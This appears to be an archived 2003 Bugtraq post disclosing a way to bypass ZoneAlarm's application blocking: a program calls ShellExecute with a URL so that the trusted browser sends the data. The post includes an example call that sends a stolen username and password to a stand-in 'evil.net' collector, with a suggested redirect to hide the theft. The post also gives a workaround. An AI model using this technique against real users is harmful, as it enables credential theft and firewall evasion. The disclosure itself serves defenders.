Bypassing ZoneAlarm (limited)

aceh_at_gyuvetch.bg
Date: 06/23/03

  • Next message: Pavel Kankovsky: "Re: Algorimic Complexity Attacks" 
    Date: 23 Jun 2003 06:12:46 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Hi everyone.
    I don't know if this is a new issue but it is a simple way to
    bypass (in some limited form) ZoneAlarm's Application level
    Internet access blocking.

    Windows dll shell32.dll exports a well known and documented function called
    ShellExecute. From Win32 Programmer's refference:

    >HINSTANCE ShellExecute(
    > HWND hwnd, // handle to parent window
    > LPCTSTR lpOperation, // pointer to string that specifies
    > // operation to perform
    > LPCTSTR lpFile, // pointer to filename or folder name string
    > LPCTSTR lpParameters, // pointer to string that specifies
    > //executable-file parameters
    > LPCTSTR lpDirectory, // pointer to string that specifies default
    directory
    > INT nShowCmd // whether file is shown when opened
    > );

    When the lpFile parameter is an Internet url, windows invokes Internet
    Explorer (or more accurately - the default web browser), which in 99% of
    the cases is allowed to access Internet, with that url. Example:

    ShellExecute(
      0,
      "open",
      "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
      0,
      0,
      SW_HIDE //This doesn't work.
              //I think it is supposed to hide the window but ...
      );

    The collect.cgi (after storing stolen_username/stolen_password) could
    redirect the user for example to
    windowsupdate.microsoft.com,
    so that many users will not even suspect anything.

    The info leaked is limited by the maximum allowed url length, but that
    could be more than enough for a malicious application to send some
    username/password/cookie/cc_number info to malicious server.

    This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all
    versions can be tricked if the user has granted access to his default
    web browser by default (very likely)

    VENDOR STATUS:
    I thing that this is flaw in the core design of ZoneAlarm
    (and/or Windows) and don't see a way it can be fixed.

    WORKAROUND:
    Do not allow ANY application to access Internet by default and
    review each request separately.

    Any comments are wellcome.
    aceh

  • Next message: Pavel Kankovsky: "Re: Algorimic Complexity Attacks"

    Relevant Pages

    • Re: Bypassing ZoneAlarm (limited)
      ... >>HINSTANCE ShellExecute( ... > When the lpFile parameter is an Internet url, windows invokes Internet ... despite the presence of ZoneAlarm. ...
      (Bugtraq)
    • Re: help!!!!!!!!!!!!!
      ... the blaster worm doesn't affect Windows ... However, I installed ZoneAlarm ... >> been unable to log on to the internet unless I turn off ...
      (microsoft.public.security.virus)
    • RE: Software Distribution Service 3.0
      ... Workaround to Sudden Loss of Internet Access Problem ... access for ZoneAlarm users on Windows XP/2000. ... ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ...
      (microsoft.public.windowsupdate)
    • RE: problem with internet access for WinXP home client
      ... Microsoft CSS Online Newsgroup Support ... problem with internet access for WinXP home client ... |> access Internet in SBS network. ...
      (microsoft.public.windows.server.sbs)
    • RE: Restrict internet access/Allow email
      ... We cannot control which user can access Internet or which user cannot ... I suggest we remove the domain user account from the local Administrators ... Microsoft CSS Online Newsgroup Support ...
      (microsoft.public.windows.server.sbs)